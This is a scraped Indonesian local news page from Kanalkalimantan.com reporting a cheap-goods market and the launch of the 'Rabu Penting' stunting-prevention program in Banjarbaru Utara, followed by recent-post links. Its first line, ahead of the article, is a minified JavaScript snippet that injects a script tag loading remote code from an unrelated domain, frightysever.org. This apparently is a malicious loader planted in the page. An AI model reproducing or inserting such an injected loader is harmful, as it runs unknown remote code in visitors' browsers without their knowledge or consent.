(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Pasar Murah dan Launching Program “Rabu Penting” di Banjarbaru Utara


KANALKALIMANTAN.COM, BANJARBARU – Pemerintah Kota (Pemko) Banjarbaru melalui Kecamatan Banjarbaru Utara menggelar pasar murah sekaligus peluncuran inovasi Gerakan Dua Ribu Pencegahan Stunting atau “Rabu Penting”.

Acara berlangsung di halaman kantor Kecamatan Banjarbaru Utara dengan dihadiri langsung oleh Wali Kota Banjarbaru Aditya Mufti Ariffin, Kamis (18/4/2024) siang.

Pasar murah diselenggarakan untuk memberikan akses yang lebih mudah dan terjangkau bagi masyarakat untuk memperoleh bahan makanan bergizi dengan harga terjangkau.

Baca juga: Ngamuk Pakai Parang di Sungai Tiung, ODGJ Dibawa ke Sambang Lihum

Sementara itu, juga diadakan pemeriksaan kesehatan gratis guna memberikan kesempatan kepada warga untuk memeriksa kesehatan secara menyeluruh.

Wali Kota Banjarbaru Aditya Mufti Ariffin luncurkan sebuah inovasi baru berupa program “Rabu Penting” yang dilaksanakan di Kecamatan Banjarbaru Utara.

Aditya harapkan kontribusi aktif seluruh elemen masyarakat Banjarbaru dalam pencegahan stunting walaupun dimulai dari gerakan kecil tapi bisa memberi dampak yang besar.

Baca juga: Pemkab Banjar Gelar Kegiatan Peningkatan Kapasitas Kader UP2K 

“Jadi kita berharap partisipasi dan kontribusi dari seluruh elemen yang ada di Kota banjarbaru untuk bisa bersama-sama kita melaksanakan pencegahan stunting ini. Jadi dari hal yang kecil dari Rp2.000 ini berdampak kepada yang besar,” terangnya.

Dia mengharapkan dengan terus dilakukannya pencegahan stunting bagi masyarakat Kota Banjarbaru menciptakan generasi unggul untuk Banjarbaru.

Baca juga: Sekretariat DPRD Kapuas Bantu Korban Kebakaran Desa Pulau Mambulau

“Jadi mudah-mudahan dengan penanganan stunting yang baik masyarakat kita terbebas dari stunting hingga kita melahirkan generasi-generasi unggul di Kota Banjarbaru,” ucapnya.(Kanalkalimantan.com/kk)

Editor : kk


Muhammad Andi

Recent Posts

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

2 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

4 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

5 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

7 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

8 jam ago

Hari Ini Masuk Asrama Haji, Kloter 1 Embarkasi Banjarmasin Berangkat Minggu

KANALKALIMANTAN.COM, BANJARBARU - Jelang kedatangan rombongan jemaah Haji Embarkasi Banjarmasin Kloter 1, Sabtu (11/5/2024), Petugas… Read More

8 jam ago

This website uses cookies.